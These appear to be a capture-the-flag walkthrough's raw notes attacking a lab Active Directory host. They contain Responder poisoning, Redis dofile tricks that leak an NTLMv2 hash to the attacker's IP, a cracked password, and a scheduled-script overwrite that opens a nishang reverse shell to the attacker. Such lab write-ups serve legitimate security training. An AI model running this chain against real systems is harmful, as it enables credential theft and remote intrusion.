  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.9.191.227]
    Responder IPv6             [fe80::7589:1b62:606e:6c09]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-ALXRPOCIKFA]
    Responder Domain Name      [XKFP.LOCAL]
    Responder DCE-RPC Port     [48193]

[+] Listening for events...

redis exploitation

10.10.22.71:6379> EVAL "dofile('C:/Windows/System32/drivers/etc/Hosts')" 0
(error) ERR Error running script (call to f_df72500a0c02a7d5e1d237a6ec4408ed87f17e68): @user_script:1: C:/Windows/System32/drivers/etc/Hosts:2: unexpected symbol near '#' 
(0.78s)
10.10.22.71:6379> EVAL "dofile('C:/Users/enterprise-security/Desktop/user.txt')" 0
(error) ERR Error running script (call to f_eebcad8707d6acaa5a1f5511b5d88676a90438d6): @user_script:1: C:/Users/enterprise-security/Desktop/user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e'

smb credentials capturing

Received in redis
EVAL "dofile('//10.9.191.227/test')" 0
(error) ERR Error running script (call to f_22a952acc4988c1dd72b11707328075e3b1081bb): @user_script:1: cannot open //10.9.191.227/test: Permission denied 
(0.73s)

Received in responder
[SMB] NTLMv2-SSP Client   : 10.10.22.71
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash     : enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000

hashcracking

haiti 'enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000'
NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]

john --format=netntlmv2 -w=/usr/share/wordlists/rockyou.txt /home/kali/thm/vulnnetactive/hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498  (enterprise-security)     
1g 0:00:00:01 DONE (2024-02-07 21:14) 0.5434g/s 2181Kp/s 2181Kc/s 2181KC/s sandoval69..sand36
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

smb enumeration (authenticated)

smbclient

smbclient -U enterprise-security  -L ////10.10.141.42\\                 
Password for [WORKGROUP\enterprise-security]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Enterprise-Share Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.141.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

smbmap

smbmap -u enterprise-security -p sand_0873959498 -H 10.10.141.42 --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.141.42:445	Name: 10.10.141.42        	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	Enterprise-Share                                  	READ, WRITE	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share

nullinux https://github.com/m8sec/nullinux

nullinux -shares -u enterprise-security -p sand_0873959498 10.10.141.42

    Starting nullinux v5.5.0dev | 02-07-2024 21:45



[*] Enumerating Shares for: 10.10.141.42
        Shares                     Comments
   -------------------------------------------
    \\10.10.141.42\ADMIN$          Remote Admin
    \\10.10.141.42\C$              Default share
    \\10.10.141.42\Enterprise-Share 
    \\10.10.141.42\IPC$
    \\10.10.141.42\NETLOGON        Logon server share
    \\10.10.141.42\SYSVOL          Logon server share

   [*] Enumerating: \\10.10.141.42\Enterprise-Share
       .                                   D        0  Wed Feb  7 21:43:27 2024
       ..                                  D        0  Wed Feb  7 21:43:27 2024
       PurgeIrrelevantData_1826.ps1        A       69  Tue Feb 23 19:33:18 2021

   [*] Enumerating: \\10.10.141.42\NETLOGON
       .                                   D        0  Tue Feb 23 04:29:58 2021
       ..                                  D        0  Tue Feb 23 04:29:58 2021

   [*] Enumerating: \\10.10.141.42\SYSVOL
       .                                   D        0  Tue Feb 23 04:29:58 2021
       ..                                  D        0  Tue Feb 23 04:29:58 2021
       vulnnet.local                      Dr        0  Tue Feb 23 04:29:58 2021

[*] 0 unique user(s) identified

smbclient

smbclient -I 10.10.141.42 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.141.42\Enterprise-Share\' 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Feb  7 21:43:27 2024
  ..                                  D        0  Wed Feb  7 21:43:27 2024
  PurgeIrrelevantData_1826.ps1        A       69  Tue Feb 23 19:33:18 2021

		9558271 blocks of size 4096. 5160889 blocks available
smb: \> get PurgeIrrelevantData_1826.ps1 
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

cat PurgeIrrelevantData_1826.ps1 
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

crackmapexec

crackmapexec smb 10.10.4.22 -u 'enterprise-security' -p 'sand_0873959498' --shares
SMB         10.10.4.22      445    VULNNET-BC3TCK1  [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB         10.10.4.22      445    VULNNET-BC3TCK1  [+] vulnnet.local\enterprise-security:sand_0873959498 
SMB         10.10.4.22      445    VULNNET-BC3TCK1  [+] Enumerated shares
SMB         10.10.4.22      445    VULNNET-BC3TCK1  Share           Permissions     Remark
SMB         10.10.4.22      445    VULNNET-BC3TCK1  -----           -----------     ------
SMB         10.10.4.22      445    VULNNET-BC3TCK1  ADMIN$                          Remote Admin
SMB         10.10.4.22      445    VULNNET-BC3TCK1  C$                              Default share
SMB         10.10.4.22      445    VULNNET-BC3TCK1  Enterprise-Share READ            
SMB         10.10.4.22      445    VULNNET-BC3TCK1  IPC$            READ            Remote IPC
SMB         10.10.4.22      445    VULNNET-BC3TCK1  NETLOGON        READ            Logon server share 
SMB         10.10.4.22      445    VULNNET-BC3TCK1  SYSVOL          READ            Logon server share 

------------------

crackmapexec smb 10.10.4.22 -u 'enterprise-security' -p 'sand_0873959498' -M spider_plus
SMB         10.10.4.22      445    VULNNET-BC3TCK1  [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB         10.10.4.22      445    VULNNET-BC3TCK1  [+] vulnnet.local\enterprise-security:sand_0873959498 
SPIDER_P... 10.10.4.22      445    VULNNET-BC3TCK1  [*] Started spidering plus with option:
SPIDER_P... 10.10.4.22      445    VULNNET-BC3TCK1  [*]        DIR: ['print$']
SPIDER_P... 10.10.4.22      445    VULNNET-BC3TCK1  [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.4.22      445    VULNNET-BC3TCK1  [*]       SIZE: 51200
SPIDER_P... 10.10.4.22      445    VULNNET-BC3TCK1  [*]     OUTPUT: /tmp/cme_spider_plus

------------------

cat /tmp/cme_spider_plus/10.10.4.22.json 
{
    "Enterprise-Share": {
        "PurgeIrrelevantData_1826.ps1": {
            "atime_epoch": "2021-02-23 19:33:18",
            "ctime_epoch": "2021-02-23 17:45:41",
            "mtime_epoch": "2021-02-23 19:33:18",
            "size": "69 Bytes"
        }
    },
    "IPC$": {
        "Ctx_WinStation_API_service": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "InitShutdown": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "LSM_API_service": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "PSHost.133518828072297203.2852.DefaultAppDomain.powershell": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "PSHost.133518828426402395.3444.DefaultAppDomain.powershell": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "RpcProxy\\49669": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "RpcProxy\\593": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "SessEnvPublicRpc": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "TermSrv_API_service": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "W32TIME_ALT": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "Winsock2\\CatalogChangeListener-2a8-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-2f8-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-304-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-304-1": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-380-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-3dc-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-424-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-8b0-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-914-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "Winsock2\\CatalogChangeListener-938-0": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "1 Bytes"
        },
        "atsvc": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "c15a459688cdcf5a": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "epmapper": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "eventlog": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "lsass": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "9 Bytes"
        },
        "netdfs": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "ntsvcs": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "scerpc": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "spoolss": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "srvsvc": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "5 Bytes"
        },
        "winreg": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "3 Bytes"
        },
        "wkssvc": {
            "atime_epoch": "1600-12-31 19:03:58",
            "ctime_epoch": "1600-12-31 19:03:58",
            "mtime_epoch": "1600-12-31 19:03:58",
            "size": "6 Bytes"
        }
    },
    "NETLOGON": {},
    "SYSVOL": {
        "vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2021-02-23 04:36:27",
            "ctime_epoch": "2021-02-23 04:30:36",
            "mtime_epoch": "2021-02-23 18:08:53",
            "size": "22 Bytes"
        },
        "vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2021-02-23 04:30:36",
            "ctime_epoch": "2021-02-23 04:30:36",
            "mtime_epoch": "2021-02-23 18:08:53",
            "size": "1.07 KB"
        },
        "vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2021-02-23 04:36:27",
            "ctime_epoch": "2021-02-23 04:36:27",
            "mtime_epoch": "2021-02-23 18:08:53",
            "size": "2.72 KB"
        },
        "vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2021-02-23 19:14:52",
            "ctime_epoch": "2021-02-23 04:30:36",
            "mtime_epoch": "2021-02-23 19:14:52",
            "size": "22 Bytes"
        },
        "vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2021-02-23 17:00:15",
            "ctime_epoch": "2021-02-23 04:30:36",
            "mtime_epoch": "2021-02-23 18:09:46",
            "size": "3.75 KB"
        },
        "vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2021-02-23 19:14:52",
            "ctime_epoch": "2021-02-23 19:14:52",
            "mtime_epoch": "2021-02-23 19:14:52",
            "size": "160 Bytes"
        },
        "vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
            "atime_epoch": "2021-02-23 19:14:52",
            "ctime_epoch": "2021-02-23 19:14:52",
            "mtime_epoch": "2021-02-23 19:14:52",
            "size": "554 Bytes"
        }
    }
}

shell access

Considering the naming of the "PurgeIrrelevantData_1826.ps1" file and the fact that we have READ/WRITE access, maybe that file is part of a scheduled task Download this https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 Add "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.191.227 -Port 4321" at the end of the script Upload it with name "PurgeIrrelevantData_1826.ps1"

smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\' 
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.8 kb/s) (average 1.8 kb/s)
smb: \> exit

------------
Get reverse shell
rlwrap nc -lnvp 4321
listening on [any] 4321 ...
ls
connect to [10.9.191.227] from (UNKNOWN) [10.10.69.113] 49909
Windows PowerShell running as user enterprise-security on VULNNET-BC3TCK1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\enterprise-security\Downloads>

    Directory: C:\Users\enterprise-security\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/23/2021   2:29 PM                nssm-2.24-101-g897c7ad                                                
d-----        2/26/2021  12:14 PM                Redis-x64-2.8.2402                                                    
-a----        2/26/2021  10:37 AM            143 startup.bat                                                           


PS C:\Users\enterprise-security\Downloads> whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads> whoami /all

USER INFORMATION
----------------

User Name                   SID                                         
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Privilege escalation

PS C:\Users\enterprise-security\Downloads> netstat -a -p TCP -o

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:88             VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:135            VULNNET-BC3TCK1SHNQ:0  LISTENING       992
  TCP    0.0.0.0:389            VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:445            VULNNET-BC3TCK1SHNQ:0  LISTENING       4
  TCP    0.0.0.0:464            VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:593            VULNNET-BC3TCK1SHNQ:0  LISTENING       992
  TCP    0.0.0.0:636            VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:3268           VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:3269           VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:3389           VULNNET-BC3TCK1SHNQ:0  LISTENING       832
  TCP    0.0.0.0:5985           VULNNET-BC3TCK1SHNQ:0  LISTENING       4
  TCP    0.0.0.0:6379           VULNNET-BC3TCK1SHNQ:0  LISTENING       384
  TCP    0.0.0.0:9389           VULNNET-BC3TCK1SHNQ:0  LISTENING       2276
  TCP    0.0.0.0:47001          VULNNET-BC3TCK1SHNQ:0  LISTENING       4
  TCP    0.0.0.0:49664          VULNNET-BC3TCK1SHNQ:0  LISTENING       636
  TCP    0.0.0.0:49665          VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:49666          VULNNET-BC3TCK1SHNQ:0  LISTENING       1028
  TCP    0.0.0.0:49667          VULNNET-BC3TCK1SHNQ:0  LISTENING       836
  TCP    0.0.0.0:49669          VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:49670          VULNNET-BC3TCK1SHNQ:0  LISTENING       764
  TCP    0.0.0.0:49684          VULNNET-BC3TCK1SHNQ:0  LISTENING       2232
  TCP    0.0.0.0:49694          VULNNET-BC3TCK1SHNQ:0  LISTENING       2388
  TCP    0.0.0.0:49699          VULNNET-BC3TCK1SHNQ:0  LISTENING       752
  TCP    0.0.0.0:49710          VULNNET-BC3TCK1SHNQ:0  LISTENING       2352
  TCP    10.10.69.113:53        VULNNET-BC3TCK1SHNQ:0  LISTENING       2388
  TCP    10.10.69.113:139       VULNNET-BC3TCK1SHNQ:0  LISTENING       4
  TCP    10.10.69.113:389       VULNNET-BC3TCK1SHNQ:49704  ESTABLISHED     764
  TCP    10.10.69.113:389       VULNNET-BC3TCK1SHNQ:49708  ESTABLISHED     764
  TCP    10.10.69.113:49704     VULNNET-BC3TCK1SHNQ:ldap  ESTABLISHED     2352
  TCP    10.10.69.113:49708     VULNNET-BC3TCK1SHNQ:ldap  ESTABLISHED     2352
  TCP    10.10.69.113:49909     ip-10-9-191-227:4321   ESTABLISHED     3968
  TCP    10.10.69.113:49986     VULNNET-BC3TCK1SHNQ:49669  TIME_WAIT       0
  TCP    127.0.0.1:53           VULNNET-BC3TCK1SHNQ:0  LISTENING       2388

------------------------------
Get powerview and upload it

┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
--2024-02-08 13:34:20--  https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’

PowerView.ps1                           100%[============================================================================>] 752.23K  2.60MB/s    in 0.3s    

2024-02-08 13:34:21 (2.60 MB/s) - ‘PowerView.ps1’ saved [770279/770279]

                                                                                                                                                             
┌──(kali㉿kali)-[~/thm/vulnnetactive]
└─$ smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\' 
Try "help" to get a list of possible commands.
smb: \> put PowerView.ps1
putting file PowerView.ps1 as \PowerView.ps1 (759.1 kb/s) (average 759.1 kb/s)

---------
Import module

PS C:\Users\enterprise-security\Downloads> Import-Module C:\Enterprise-Share\PowerView.ps1

PS C:\Users\enterprise-security\Downloads> Get-DomainGPO


usncreated               : 5672
systemflags              : -1946157056
displayname              : security-pol-vn
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EA
                           C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
                           C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged              : 2/23/2021 11:09:44 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 20506
dscorepropagationdata    : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated              : 2/23/2021 9:30:33 AM
versionnumber            : 3
instancetype             : 4
objectguid               : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local

usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EA
                           C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 2/24/2021 12:14:52 AM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 24594
dscorepropagationdata    : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
whencreated              : 2/23/2021 9:30:33 AM
versionnumber            : 4
instancetype             : 4
objectguid               : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local

-------------------
smbclient -I 10.10.49.44 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.49.44\sysvol'            
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb 23 04:29:58 2021
  ..                                  D        0  Tue Feb 23 04:29:58 2021
